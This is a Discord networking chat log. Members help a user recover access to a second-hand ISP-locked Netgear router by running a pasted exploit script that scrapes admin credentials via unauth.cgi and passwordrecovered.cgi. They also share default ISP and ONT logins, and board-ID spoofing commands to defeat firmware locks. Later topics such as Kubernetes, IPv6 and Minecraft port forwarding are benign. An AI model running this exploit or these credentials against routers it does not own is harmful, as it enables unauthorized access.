#networking

in telnet?

make a file this these contents

import requests


def scrape(text, start_trig, end_trig):
    if text.find(start_trig) != -1:
    return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
    else:
        return "i_dont_speak_english"
#disable nasty insecure ssl warning
requests.packages.urllib3.disable_warnings()
#1st stage - get token
ip = sys.argv[1]
port = sys.argv[2]
url = 'http://' + ip + ':' + port + '/'
try:
    r = requests.get(url)
except:
    url = 'https://' + ip + ':' + port + '/'
    r = requests.get(url, verify=False)
model = r.headers.get('WWW-Authenticate')
if model is not None:
    print "Attcking: " + model[13:-1]
else:
    print "not a netgear router"
    sys.exit(0)
token = scrape(r.text, 'unauth.cgi?id=', '\"')
if token == 'i_dont_speak_english':
    print "not vulnerable"
    sys.exit(0)
print "token found: " + token
#2nd stage - pass the token - get the password
url = url + 'passwordrecovered.cgi?id=' + token
r = requests.post(url, verify=False)
#profit
if r.text.find('left\">') != -1:
    username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))
    username = scrape(username, '>', '\'')
    password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))
    password = scrape(password, '>', '\'')
    if username == "i_dont_speak_english":
        username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))
        password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))
else:
    print "not vulnerable becuse password recovery IS set"
    sys.exit(0)
#html encoding pops out of nowhere, lets replace that
password = password.replace("&#35;","#")
password = password.replace("&","&")
print "user: " + username
print "pass: " + password```

no

in command line

in .txt ?

so after you make a file let's name it netgore.py

in cmd?

yes, that's cli

in python>

then you do python3 ./netgore.py

if that doesn't work you can try python ./netgore.py

in python?

in command line

cmd

powershell

ok

your choice

what???

you pasted that

into cmd

ok

so

on your desktop create a file

ok

with the contents of the expolit script I posted above

name it netgore.py

in a txt doc?

no, .py

am i missing something here?

what are you confused about

im on my desktop

and i right click

oh yeah, create text file

we can change file extension later

idk really if it actually matters

This is going way too hard. Just get a clean modem/router

@thorny vector I cant

he basically got a router from goodwill but the firmware is ISP locked

Ahhhhh, ok

idk how the person sold it in the first place

I mean for you and me it would be kinda easy depending on how old it is

yes

but teaching command line is hard

i just need 1gb connection

i created a file

at this point, just get yourself a mikrotik or a good router

I wouldn't even bother. I don't have enough time to try to get into a router when I can just stand up a VM for one

called netphone.py

ok now open file explorer and go to desktop

ok

SHIFT + RIGHT CLICK on an empty space and click open in powershell

this will open the desktop directory in powershell

did

ok now try python3 ./netphone.py

umm

no python 3

you could try

just python ./netphone.py

yep

install python

or if you have it already install it to path

?

ill reinstall python

I don't know why people like software based routing like pfsense. High latency and buffer. Yuk. I prefer my packets in and out as quickly as possible. No buffer

software routing has it's place, but imo not as a core router

If you say so. I prefer flat physical topology and abstraction occurring in as few hardware devices as possible. Sometimes people make networking more complicated than it needs to be just because they can.

like I have it as a edgerouter for my kubernetes cluster

@copper rover @peak cloak umm

what now

no clue

script error

Short version - what's the primary difference between Kubernetes and Docker from an abstraction? Is Docker a portable whole stack whereas the other is just the app that is glued together with an API spanning different host servers?

K8s is an orchestrator

it orchestrates Docker

kubernetes is an orchastrator. It CAN run containers in docker runtime, however it was actually removed because of security issues. There are many other container runtimes as well, but they can run docker containers because they are built on the open container initiative

Although, K8s is depreciating Dockers in favor for CRI

https://youtu.be/PziYflu8cB8

https://kubernetes.io/blog/2020/12/02/dont-panic-kubernetes-and-docker/

Interesting, thanks. I'll check those out

this video REALLY simplifies it but gets the idea across

https://kubernetes.io/docs/tutorials/kubernetes-basics/

this is also funny

https://www.cncf.io/the-childrens-illustrated-guide-to-kubernetes/

@copper rover

install what to path and what path?

@copper rover do you know how to do python?

No, at best I can navigate around PowerShell within reason. But I can't script from whole cloth on my own, but I'm good with modifying existing code with to a certain basic extent. Meaning, I'm not a power user of it.

Python? No clue

umm

Seems Line 1 has some bad syntax

and how do i fix it?

I finally got my desktop wired up with copper cabling to do some iperf speed tests. Cutting out the slow opnsense router from the equation made the biggest difference. With opnsense router, it was capping at 250 mbps from desktop (wired) to surface laptop (wifi). Same LAN for both desktop and surface laptop iperf testing showed max speed of 784 Mbps between them. I am now getting the full speed. That router is slowing everything down for me.

I found an updated copy of iperf that isn't broken on Windows and works great, iperf3.9 https://www.neowin.net/forum/topic/1234695-iperf-39-windows-build/.

My bad

So from the looks of it, the code is in the file, but not all of what's in the file is the code. If that makes sense

mhm

Look at that file you sent me. There's two sections of code from a netgore.py and netgore2.py file.

netgore.py

import sys
import requests

def scrape(text, start_trig, end_trig):
if text.find(start_trig) != -1:
return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
else:
return "i_dont_speak_english"
#disable nasty insecure ssl warning
requests.packages.urllib3.disable_warnings()
#1st stage - get token
ip = sys.argv[1]
port = sys.argv[2]
url = 'http://' + ip + ':' + port + '/'
try:
r = requests.get(url)
except:
url = 'https://' + ip + ':' + port + '/'
r = requests.get(url, verify=False)
model = r.headers.get('WWW-Authenticate')
if model is not None:
print "Attcking: " + model[13:-1]
else:
print "not a netgear router"
sys.exit(0)
token = scrape(r.text, 'unauth.cgi?id=', '"')
if token == 'i_dont_speak_english':
print "not vulnerable"
sys.exit(0)
print "token found: " + token
#2nd stage - pass the token - get the password
url = url + 'passwordrecovered.cgi?id=' + token
r = requests.post(url, verify=False)
#profit
if r.text.find('left">') != -1:
username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))
username = scrape(username, '>', ''')
password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))
password = scrape(password, '>', ''')
if username == "i_dont_speak_english":
username = (scrape(r.text[r.text.find('left">'):-1], 'left">', '</td>'))
password = (scrape(r.text[r.text.rfind('left">'):-1], 'left">', '</td>'))
else:
print "not vulnerable becuse password recovery IS set"
sys.exit(0)
#html encoding pops out of nowhere, lets replace that
password = password.replace("#","#")
password = password.replace("&","&")
print "user: " + username
print "pass: " + password

which do i use?

That's the code

so i put this into py

Cut and paste it into a new txt document and name it py would be my guess

do i copy the ##netgore.py

py extension

You can, it will rem it out. Should be harmless

ok

ahhh

Anyways, the second part of the code is in ##netgore2.py.

My advise is that you read the entire document. It contains instructions and other discussions

is this supposed to give me my telnet username and pass?

Yeah, that's the idea. Supposedly it will scrape the credentials out.

@copper rover what about this?

do you know what error this is?

indention error. Python is a white space delimited language. Gotta clean up the lines and indents

I dont know how to py, so could you help out?

Not actively. Doing some dev work

oh ok

More to the point, I have no idea how to execute that code against the router. Is it supposed to hit port 80 against it, or via a telnet session inside the router?

I"m thinking port 80 HTTP or 443 HTTPS. No clue

And how you target it within the code? See, I don't know much how to utilize it.

Welcome to my wooooooorld...

https://beta.darkreading.com/attacks-breaches/password-manager-suffers-supply-chain-attack

i was guessing that we run the code and it spits out the password

The password has to come from the router though.

@copper rover https://openwrt.org/toh/netgear/telnet.console

It's basically dumping the results from RAM inside the router

i unlocked it

Ahh ok

i think we do port 80

cuz its a older router

Yeah, HTTP is port 80

it closed automatically

HTTPS is universally 443 (SSL)

first few lines of the script, calls 2 sys_args, for IP and port

^

you pass sys_args in the command line after calling the script

the thing is, why did the creators of this code make it so personalized?

do this, then that

Its not?

huh

I't pretty generic, pretty well written

i mean i just never taught myself py so im braindead rn

handles everything for you, including scraping the page it retrieves.

ok

so we just need to fix that line of code and we good?

Don't fix it. You pass it

pass it to who?

python3 name_of_script.py <ipaddr> <port>

im supposed to open it in powershell

You still have to define the routers IP and port 80 in that line

right?

Does PS run Python code?

Also, need to make sure you have the requests module pulled down. You can do that with pip. And you're calling the python3 binary in powershell, and pointing it to your script

python3 41205.py 192.168.1.1 23

is this correct command?

No, because its not targeting the telnet service.

how do we target telnet service

i need putty for that right?

We don't This isn't a telnet vulnerability

correct

It's HTTP. Replace port 23 for 80 in that code

OK

caps

i replaced and ran it

still syntax

this is the offical one i think

Right, because Trustwave SpiderLabs is a remark, not code

That top line probably isn't commented out

exactly

so i delete it?

That's why he needs to omit that portion of the document

Copy the document. Then save it was a new file. Then modify this one by clear it out

The stuff non-relevent

Oh jesus. Everything that isn't code needs to be gone or commented out

All the paragraphs, text, etc

🔫

this is my head, omit

what

so i need to delete(omit) all the text thats not code if im correct

Yeah

See, that document contains both commentary by the author in addition to code. But you can only execute the code.

In a perfect world, it would be split into two documents for you, one the commentary, the other the py file

You have to dissect it yourself

OHH

THERES TWO CODES

Do i need to seperate them?

Yuppers. It would appear so

1 file seperated into 2

lets see

kirashi

i meant st

uh... I don't mean to interrupt, and no guarantees this will work, but if these people are correct, Netgear may have altered the way TELNET works on certain models of their routers. since your R6300v2's boardid has been altered by Charter/Spectrum, you can attempt to flash one of KONG's legendary custom firmware's on it. (unless you tried his firmware already.)
https://www.myopenrouter.com/forum/firmware-file-incorrect-r6300v2-dd-wrt
if that doesn't work, you might just need to use the custom telnetenable client as outlined in this thread, change the boardid, and then flash an official netgear firmware.
https://www.myopenrouter.com/forum/changing-board-id-charter-edition-r6300v2-dd-wrt-firmware

@ornate jungle i mean this is a old firmware so it might

My understanding is that ISP's simply have Netgear alter the boardid value when flashing their own custom firmware. An altered boardid will prevent regular firmware flashes... unless someone (AHEM cough cough the legendary KONG) alters a custom firmware file. 😉

wait but does anyone know why this happens now?

it doesnt let me download anything on the website

and dd wrt

ftp://downloads.netgear.com/r6300v2/chnas/ 

it starts with ftp

which im guessing stands for file transfer protocol?

wow, you guys are still at this?

@green forge What ISP did you say this router was issued by?

@copper rover spectrum wifi

Surrender doesn't come easy

since its some firmware and sw at the end

@tender hazel maybe even tommorow

kong

have you tried logging in as admin/password or admin/admin ?

i can try

worth a shot

OMG, that's like turning the door nob to see if it's even unlocked

with defaults like that, it's basically unlocked

lol

nope

let me try admin pass

nope

im guessing this thing has a hard coded password

Well, you factory reset it, so there's a default user pass

and username

alr let me see

Google spectrum default passwords

they might have made something like the serial number the password

it's easy to do that with such devices

serial numb?

Prolly the mac address or something

or a portion of it

i mean

they could have hardcoded the username and pss

the serial number or mac address

the problem with hardcoding is it means they are the same on all units

oh

Yeah, there's a formula to it

and that is perhaps good for techs but is bad if someone figures out what it is

but is the mac or serial a password or username

it would be a password

not a username

the username would be the same on all devices

It's how I was able to get in my ISP modem to check QAM coax levels 😉

Googlefu is required to figure it out based on the mac address

huh? whats that?

im in.

TEL NET LETS GO

Let's just say I had poor coax signal levels. I cleaned them up and levels now good.

@copper rover o nice

screw you code

well that saved us alot of time

WAIT

ican clear vram in here

hehehe

Well, sure. But I believe that's the same as holding down that reset button

And you've already did that last I recall

It clears config, not firmware

It will put you back to square 1

so what was the password? the serial number?

nope

i guess i typed to fast

but the username and password was admin and pass was cciadmin

Oh, then yeah, that's it. Should be full unrestricted mode

wt

now i cant log back in...

cciadmin is from Consolidated Communications

it works

what am i doing

one second i type it right and the other not

ok

so im back in

@copper rover thats what im saying, how can this thing be from cci if its also from sw?

did they not have permission to get a custom firmware for themselfs?

No clue. Maybe one ISP took over the region of another an inherited the customer equipment being used?? God only knows

also, not to be rude, but what time is it for you?

well you have all busybox utils

and more I guess

close to 10pm. I will be leaving in the next 10 minutes

@peak cloak you came back

kinda

its almost 8 for me

have to go soon

almost 11 for me

dam

you guys avalible tommorow?

wait

that command

@copper rover what was that tftp command

that works

but we just couldnt get to work due to read only?

got it

Shit

nope

Are you familiar with an ISP called Sure West?

SW

is it referring to my pc or the router?

THATS RIGHT

i saw that in

a forum yestery

yesterday

ohhh

its cci

Yeah

"In case anyone else is ever in my shoes, I should add, after much research on the web, I have Consolidated Communications as my internet provider now (they bought out SureWest) I have tried Surewest admin and password information that generous people have put onto various websites, as well as CCI information. None of the passwords work. From what I have read, I will have to call on Monday to get this information, if they will give it to me. I cannot access the Netgear Genie to update the router without it. Once I get it, I will let people know what I've learned in case anyone else has this frustrating issue. "

From a netgear forum

2017

huh

too bad he didnt realize that there was no new update

@copper rover look at this

yeah you can't remount because it is flash

you have to download the firmware to a writeable location like /tmp

these are the available ones

and search the file system to see if there is some kind of update program

for updating the firmware

there probably is

Netgear Genie I think it's called

how do i serch

It's their firmware update tool

find . | grep "update"

from the root directory

or find . | grep "genie"

if it is called genie as StDragon76 says

you can also try other permutations

is the command find grep genie?

https://www.netgear.com/support/product/R6300v2.aspx#NETGEAR Genie App (Windows)

Download the windows app

alr

Latest Netgear firmware is 1.0.4.52

Download that too. Maybe you might be able to overwrite the custom firmware image from the ISP.

i had it downloaded since yesterday

But if prompted for credentials, it should be that cciadmin one

yeh

If that doesnt' work, then it's firmware locked

Oh, for anyone that likes reddit and likes to live in the command line

https://github.com/tildeclub/ttrv

Or there's another root account that's not documented anywhere

Just found this, quite nice

Their firmware tool will be a windows run utility that connects to the router

@copper rover i got into it i think

now that you're in the RTR, I imagine its just a stripped down linux box

What does uname -a print out?

That is interesting

Hey, no ads. lol

yuuuup

i had to use archive.org to get genie

the link broke so

??? Genie should be in that link. Are you saying it's broken?

doubt genie would work

you need to do it the hacky way

@copper rover everythings been broken for me, not my falt

fault

WTF

how is this app able to see my asus router and all the stuff connected to it

Because it's scanning your local subnet IP scan

Nothing new

oh

i booted router back u

p

what do i do now

disconnect from wifi?

See, this is one of many reasons Netgear is ass. Their website sucks as well as their products.

yeah xd

They will prolly go the way of BenQ. Sick burn, but they deserve it

alr il lget on my phone

wha

@copper rover is this like messed up specs

no wonder it sucks

hold up

it says that my router doesnt support readyshare

even though i have it?

oh well

@copper rover what am i supposed to do in here again

?? Does not having readyshare matter? It's disabled or non-existant in the custom ISP firmware

Does the Genie app require readyshare to upload the firmware I wonder?

I figured the Genie app was just a fancy TFTP program

but what are we gonan do in here

If the above is true, then I'm afraid your SOL

sol?

Shit Out of Luck

so we want to upload a firmware onto the genie?

Genie is just a program with a feature to upload firmware to the netgear router.

https://kb.netgear.com/25886/How-do-I-update-my-router-s-firmware-using-NETGEAR-desktop-Genie

That's the gist of it

uhh

Slim chance it will interface with custom ISP firmware unless the core of it is based on the original firmware image from netgear.

It's really a question of how much of the custom image is just window dressing for branding vs actual changes in features making the router locked down and neutered

it should be

do we want to upload the firmware into the genie?

Here, read this entire thread. It's interesting. But seems to lead in the direction you're wanting to go.

https://www.myopenrouter.com/forum/firmware-file-incorrect-r6300v2-dd-wrt

From a terminal command to the router, you might be able to run "nvram get board_id" (no quotes)

Anyways, I GTG, good luck.

@copper rover gn, ill dm you tommorow?

Maybe later

Check this out from that forum. Changing that board ID might be the secret sauce.

use telnetenable

run command

telnetenable 192.168.1.1 ROUTERSMACADDRESS admin password

then use putty to connect to telnet 192.168.1.1 port 23

type command

burnboardid U12H240T00_NETGEAR

then type command

nvram set board_id=U12H240T00_NETGEAR

then you should be able to update your charter netgear R6300v2CH from 1.0.3.6CH to the standard V1.0.4.2 and then install DD-WRT for R6300v2

Anyways, read the entire forum before doing that.

@green forge you would be a lot better off just buying a mikrotik router

@copper rover i just burned a false boardid to it

just need to flash new firmware and ill be done

@tender hazel nah

@green forge just flash the .bin with the "update" page

Also... @tender hazel look what I found: https://git.lsd.cat/g/nokia-keygen <

what bin

Its the ONT Logins for tons of the Nokia and Alca models

I was digging for something like that

@plain siren i dont have a bin file

If you dont know what I mean by that, You prob shouldnt be messing with your router like this

@plain siren its still a paperweight

@plain siren it is some donated garbage router that someone else threw in recycling

a netgear that had some custom firmware loaded on it for an ISP

it's a big waste of time to try to flash that, I think

@tender hazel Look, Im broke

I dont have cash

hold on....

AYY im in the AT&T Fiber PON/ONT/whatever! Fudging magic

why wont the nvram command work

i need it to work

to trick

type login

ok

@green forge how are you getting online right now?

obviously you have some kind of working router

uhhhhhh

well this is how do i explain

LOL

i need this router to control all the incoming traffic for my switch

which is in a house

...

and all the other routers are 100mgbs

which is bad

so this is the only 1gb one

exept the apple one, no thank you

But why

100 mega gits ber second is bad, yeah

i need 1gb in each room of this house

What do I do after that

contemplate the meaning of life and your place in the universe

@tender hazel No.

no? that's not a good thing to do after typing login? 😉

honestly there is probably some kind of update command on that device

to update the firmware from an uploaded file

if you can figure out where that is and run that against a firmware uploaded to the /tmp folder

maybe that will work

user pass of PON was itms itms omfg

what?

imma be back -AFK

back

@plain siren but what .bin file should i use?

the DD-WRT or whatever you are trying to install

You know your router has a whole wiki page with inst

.bin is only used if your upgrading your dd wrt

just why wont the nvram command work?@plain siren

ohh

open wrt

prob the OEM Firmware designed to block it

@plain siren the thing didnt work, 404 not found

You telling me your UI doesnt have an "Upload Firmware" option even on this ISP shit

well it does but its not like

Well, there are OEMs like TP-link that block firmware files that aren't signed by them

That's from my experience trying to flash open-wrt on my aging tp-link router that has no purpose other than to collect dust

this is a isp locked router

Wait, ISPs can lock routers?

yes

chess birdo

I did not know that

isps lock down routers from updating to standard firmware

which is why

im trying to trick the router into beleiving its a retail one

WEll, good luck, hope you are successful

do you know a thing or two about this?

nope

i hate my ISPs router

to be able to push my own DNS server over DHCP i will have to use another router between my network and their router because this is all they provide.

Of course i could put DNS records for my internal network names in my public DNS too, but that is not a good idea.

no bridge mode on their modem/router combo?

optimum here with their fiber is the worst because it's a fiber ONT and a router, plus it's passthorugh mode doesn't work and it's GPON fiber so you can't really use your own ONT. verizon fios has a dedicated ONT on the other hand which just plugs into either your router or their router

we are in IPv6 era, so no. They do their own IPv6 DS-Lite for IPv4, plus they only give out /64 IPv6, so there is no way to put own IPv6 router inbetween, and DHCPv4 has no DNS option as you can see above.
The only way to 'break' it is to add own your own router inbetween, which is not that big of an issue, Double NAT doesn't break much when you are behind an ISP grade IPv6 DS-Lite NAT anyway

yes, i could change ISP, but that would mean losing the tv service i kinda like

probably the mirror your client uses is not capable or not willing to give out data faster

once you go in speed of hundreds of megabits, it is not just about your download speed, but also about the other side's upload speed

Your internet speed doesn't only depend on your network but also the servers from which you pull data

Ah, only a /64 though? I thought /56 was the standard

well, their router gets /56. but gives out only a single /64

Ah

and their router is impossible to replace

Why?

Modem/router

Or fiber?

because they do not allow other routers or modems on their cable network

That sucks

as i said, i could change ISP, but the issue is pricing 😄

If it was configurable enough there is a way to make dchpv6 to give out the whole /56

If it was something like a mikrotik

As always

let me explain:

• right now i get 500/30 internet with ~120 TV channel for 39 euros.
• alternatively i could go to a FFTH ISP, 600/60 package upgraded to 1000/300 would cost 36 euros alone. Or 44.03 euros with static IPv4. Unsure about being able to use own routers/modems tho

at 600/60 it would be 21 euros, 600/100 would be 26 euros, 600/300 would be 31 euros. Or 8.03e more for static IPv4.

and then i would have to pay 9.99 euros for the tv channels i get now, for TV over internet option

the really sad part is that i would be fine with all the limitations, only if i could push my own DNS records to the router and/or set my own internal DNS server

which in the end means i need to add another router inbetween, to break IPv6 assignments and do another NAT

(where i can then do my own DHCP & DNS assignments)

Alright so I was redirected to here from #tech-support so hopefully someone can help me. I am trying to play some Minecraft with my brother on a LAN server hosted on his computer. We are on the same network, I entered the IPV4 Address + Port Number correctly and got this error "Io.netty.channel.AbstractChannel$AnnotatedConnectException: Connection time out: no further information" I tried turning off the firewall on both computers and still nothing. We dont use any anti-virus besides basic windows security, so got any suggestions on what might be wrong?

Are you running the same Minecraft version? Are you both on the same edition? (Bedrock/Java)

Yeah, both on 1.16.5

Java

Can he join you if you host?

Maybe, I will try that and get back to you

it is also possible one has to start the game first for the server to be set up, and only after that you can join

Nope failed, cant launch the world

And you are both in the same physical area/physical LAN?

We are both on the same Wifi Network so yes

@waxen saddle

Can you ping your brothers' computer?

did you follow the steps as guide says ? https://help.minecraft.net/hc/en-us/articles/360035131391-How-do-I-play-multiplayer-

You then launch the game and click "Single Player" and create a new world or open an existing one. Once inside that world, press the Esc key, then click the "Open to LAN" button.

then set options, then

Once you have set these options, click Start LAN World, and you'll see a message that a local game has been hosted. Other players on the same network who wish to join can now start their game, select Multiplayer, and in a few moments, their computer should automatically detect the game.

I think so

Yup. I was wondering if your AP was in Isolation mode, which would block your computers from seeing each other on the network.

They are all private ips if it starts with 192.168

So no need to block it out fyi

Here's one to try: Test-NetConnection <Server host IP> -Port <Minecraft Port Number>

Run from guest computer.

Run it in Powershell, like your ping. It's a bit smarter and will tell you if the actual port's open.

Think we might have found a culprit

Ok. So the port seems inactive on the remote side. two things are likely: 1. Your port number does not match. Try using <Server IP>:<Server port> on the host PC to join as you would from the guest and see what happens. Or 2. Your firewall is still active.

We need someone to pin this for windows users

back from performing test on brothers computer, same result

I must have used it dozens of times while troubleshooting a particularly weird IPsec problem a few months ago. Remote end vendor refused to give me their actual config and there was weird stuff going on that didn't quite line up with the documentation they provided.

Sophos UTMs suck, do not use them for IPsec termination. They are old.

If it's happening on your brother's PC too there's something up with the server.

How are you hosting it, by the way?

LAN server

Standalone server or using the integrated feature in-client?

Basically opening a regular world, pressing esc and then Open To Lan

Yep.

So you tried test-netconnection over there while it was running and couldn't connect?

Yup

Try Test-NetConnection 127.0.0.1 -Port 63927 on your brother's PC.

I already did that earlier

Specifically 127.0.0.1

Okay then

Ok.

That's a different port.

Your earlier test was for port 63927

yeah, accidenaly shut down minecraft server but still same results

If you use ipconfig on your brother's computer, can you see an ethernet or wifi adaptor with an address that looks like 192.168.X.X or 10.X.X.X?

If so, can you confirm this was the IP address you were trying to connect to from your computer?

Hi can somebody help me out here I am hosting a modded MC server on my pc like 2 months ago everything was fine I have done it before couple times everytime worked fine. But now with port forwarding it doesn't work I googled it I did steps like via windows defender etc trying to port forward again noting works I checked it says that the port is closed or can't find it I can join the server via localhost myself but my friends can't find the server I gave them the right IP like I always did before this problem

@proven epoch Did you try joining 192.168.1.96:63999 from your PC?

I'm not sure this is the right place for your question. Consider #tech-support?

yeah, but port number changed again, but still no results

Why do you keep restarting the server?

@fringe cliff you made sure that your local machine has a static dhcp lease?

brother keeps shutting down minecraft accifdentaly

Just use a dedicated copy of Minecraft Server and call it a day. You can't test connectivity if the server keeps shutting down.

Sorry idk much about this but like 2 months I hosted a server on MC as well and it worked perfect in that time I changed noting in my router settings or anything so idk how to make a static dhcp lease or something

yeah screw lan at this point I am just gonna setup a dedicated server on my computer. Well thanks for the help anyway Meagus

@fringe cliff does the address to which it port forwards, still correspond to the machine you are hosting it on ?

sometimes, the address your computer obtains from your router changes.

What is the issue?

I looked in CMD and did ipconfig all and I used that ipv4 address I checked youtube videos and you need that adress to port forward but it has changed yes that address last time I did it the last numbers went from 16 to 11

No worries, I am just gonna use something different.

You could scroll up, just a suggestion

@fringe cliff yeah, so regular home networks are a /24, meaning that only the last digit in the address changes.

well yall have a good day

so you have 192.168.1.0 up to 192.168.1.255

Ya I couldn't understand what is this port

If the address changes, then your port forward will no longer work

@fringe cliff most routers allow you to configure the DHCP server, to reserve an address for a specific computer

That's why I did the port forward with the new ipv4 adress I also tried the old one and didn't worked

You mean make a DHCP binding? I can make that with MAC adress and IP adress

Correct.

So I need to make a DHCP binding with my computers MAC adress and what IP adress?

Did you remove the old port forward, or just make a second one?

Removed it only tried it with 1 everytime

@fringe cliff yup. that makes sure that the DHCP Server always hands out the same IP address to that computer with that specific MAC

Which IP adress do I need to fill in if I am making the DHCP binding?

You could use the address it has right now

if you then configure your port forward, it shouldnt break again

unless ofcourse, your public IP changes

that's a different can of worms

So now I need to make a DHCP binding with my computers mac address where I host the server on and use my public IP adress in the dhcp binding idk if I am getting what you mean sorry

No, your public IP has nothing to do with the LAN stuff

your port forwarding forwards traffic destined for your public IP, to go to some IP on your local network.

Okay so I need to make this but what do I need to fill in here?

yeah, so mac address are those 6 bytes

I need the mac address where I am hosting the server on right?

Yeah, that corresponds to the physical address of the network interface of your computer

its reported by ipconfig as well

And what do I need to fill in in IP adress than?

you could just use the address that your machine uses right now

doesn't matter, as long as it is in your LAN range

So by CMD Ipconfig the IPV4address?

yeah

usually its something like 192.168.1.X

DHCP servers usually hand out a random address that is not in use

but if you use port forwarding, its useful to have these leases static.

Okay I have made an DHCP binding now

Okay, go back to your port forward

update the local address

??

Should I remove my old port forward and do it again or?

@fringe cliff your port forward, forwards traffic of a specific port & protocol, to a local IP address.

Just modify it

and change the IP address, to the one you just configured in your dhcp server.

The ipv4 adress from my pc I also used to make that dhcp server

Yep

DHCP binding makes sure that your PC always gets the same address

and then we can use this address to port forward to

Okay I did the port forward with the same ip adress as the dhcp binding

Thats' it.

done.

Should work now :P

So now restart my server and it should work

probably dont even have to restart it

It still didn't work I am restarting it now tho

minecraft right?

Yes

@fringe cliff did you modify your server.properties at all?

No serverip is empty port number is always the same 25565

Okay. yeah if the IP is empty, it means the server will listen on all available interfaces.

That's good

Nope still doesn't work

@fringe cliff and you are certain it worked before?

I gave my friend my public ip and I gave him the public ip with behind it :25565

you don't have to put the port behind it if it is the default one

Yes like 2 months ago I hosted as well my MC server to play on with him and it worked fine

@fringe cliff might want to check if your computer's firewall isn't doing anything funny

Can you reach the server using another computer on your LAN, by entering the IP of your computer directly (instead of your public IP) ?

I checked a video where it showed me to change certain settings and I did that also didn;t worked

Usually windows firewall fucking things up

@lean pebble I had a stupid DNS issue with my VPN tunnel yesterday, ubuntu dns resolver garbage with Systemd

thankfully the guys were able to figure it out

Ye if I use the ipv4address it works for me same with localhost but not for my friend

I had the same issue to

stupid systemd-resolv

Yeah I had it on fedora

If it is windows firewall what should I change on my computer to fix it?

@fringe cliff Im afraid I don't know :/

I'm not a windows user

You just need to open the port there to

Try disable it at first

I wish Microsoft will move to iptables / firewalld, instead this crappy windows firewall

Via a youtube video it said I had to do this but that also did not work

Enable them in private and public the Java SE binary's

@lean pebble entire IP stack that windows has is garbage.

Its slow, very limited on regular versions of windows

Agreed

You should probably just use Linux for any kind of server

I also did it manually with adding the port 25565 in inbound and outbound both TCP etc

That's my advice

I like Linux as well but I also wanna play the game my self you know I don't have a server hosting pc yet

Please disable windows firewall completely for testing

Ah

All 3 Doamain network private network and public network?

BTW you can play Minecraft and host a minecraft server on the same Linux machine

True but I also have other games I play etc and windows is easier to use for that

Using ubuntu / fedora / mint etc

That's why I run Linux as main os and windows in kvm virtualization with gpu passthrough

But should I turn off All 3 Domain network private network and public network?

Nope

Just enable javaw for private and public

I already did that but doesn't work

Did you try to disable the firewall?

How and which one?

Windows firewall

all of it

disable it

there's a big red button probably

https://support.microsoft.com/en-us/windows/turn-microsoft-defender-firewall-on-or-off-ec0844f7-aebd-0583-67fe-601ecf5d774f

This?

Yeah

Left turn windows defender on or off

Okay did that

Still can't find the server tho

Can you send the server output ?

And the server log and server.propeties

Ok

Can you take a screenshot on your server cmd prompt

It's a lot in there tho

Only the ending

And the beginning

I can't see the beginning anymore tho

I mean the server works fine I can join and play if I use as IP localhost

Ooh ye and turning the firewall off also does not work

You have a lot of issues

Restart the server

I mean I did not change really anything it's a fresh server only changed the amount of ram the server can use

Well I tried hosting a vanilla MC server real quick also does not work so it's not the server that is the problem it's something to do with the port not opening I guess

Double check your port forward config in the router

hey, im trying to use a dns server that allows me to bypass region restrictions on netflix, disney+ etc.

but it isnt working for me

restarting, flushdns

registering and releasing it

i dont know much about it lol

but yeah

DNS Servers wont likely bypass region locks

You need a VPN, or more correctly: A Proxy

Or can use tor

That would be so god-awful slow

I used to use a DNS server that did, it worked for netflix anyway

netflix did something to start blocking that about 4 or 5 years ago and I stopped renewing the service

they all use the same content region filter service now.

here. and TVEverywhere's GeoLoc (GeoIP + Language + Location Data from Device on top if Applicable)

Back then, the load balanced DNS Resolution would just check to see which "Closest" DNS Server you resolved to and set your region to that

lots block tor

it's so hard to choose a VPN because it seems like nobody can come to a consensus on who the best provider is...

Using l2tp, netflix doesn't recognize VPN :P

protocol doesn't matter

it's the endpoint

and the routing

It is a cat and mouse game. VPN is not foolproof. Netflix can always use some client side code to detect if you are really in US. E.g. using javascript getTimezoneOffset(). If you are on GMT+8 like me, then you are sexposed.

I'm a developer and I've launched a new app to help users manage their VPN on their routers. I'm shy AF... been thinking to ask someone from LMG to check it out for a few weeks... what do you guys think I should do ?

what do you mean help users manage their VPN on their routers - what kind of router?

Wi-Fi routers running DD-WRT or OpenWRT

what does the app allow that you can't do with the regular UI?

few things, server list, favorite servers list, connection history, analytics, logs, speed testing

of course, managing clients and vpn bypass, vpn force etc

it's been my quarantine activity to pass time, I'm working on other features as well

I'm anxious about reaching out to anyone at LMG... 😦

does the linus group even use DDWRT or OpenWRT?

good question hehe

I don't

I mean with a lot of their target users I would say they do not use either, and they probably do not use either themselves

so it wouldn't make sense for them to review a VPN management app for devices that they don't use and that most of their viewers don't use

hmm, 9 years ago, but still: https://www.youtube.com/watch?v=PsaHCRkMKnk

:))

yeah that's from a long time ago

hmm, okay, guess I'd asked before getting even more anxious about this

stock firmware with a bunch of routers has gotten to be more and more capable, and whenever you flash with openwrt or ddwrt or whatever there is the risk of bricking the device

still VPN support sucks on stock

very few people are going to risk bricking their device just to get a handful of new features that they don't even use

I actually made this out of frustration.... wanted to get VPN on devices without native support and the fiddling with all the damn settings and profile is a pain

I've been using these firmware for years, maybe I was just lucky but never bricked a router 😛

and it is mostly power users who would be super comfortable with that who would be the market for that

I just prefer to get an actual device that has actual features

yeah

instead of flashing some custom firmware which idk 100% if it will work

right now I have this

https://www.ui.com/edgemax/edgerouter-x/

yeah linus uses lots of ubiquiti stuff like edgerouter/unifi models, plus pfsense

and raspberry pi for ad blocking 🙂

I run this https://www.netgear.com/home/wifi/routers/r7800/ with DD-WRT

Moving to an hex-s soon

btw, is WiFi 6 worth it today ? should I wait for an upgrade ? I know there's little support for it

depends

I have almost that can be wired, wired

so really wifi is only for a few devices

and I don't live in a congested environment like an apartment

with a congested environment wifi 6 can be worth it

wifi 6 mainly improves on sceduling

Wifi is always shit compared to wired

of course

I’m debating WiFi 6 upgrade

We have so many more WiFi 6 clients now

It used to be just 2 phones, now it’s all of our phones, a tablet, and my laptop

hmm dunno, running my Oculus Quest 2 would definetly benefit from a tether-less experience, especially with that v28 update coming

so I guess that'd be wifi hungry to stream the 2k 120hz update ?

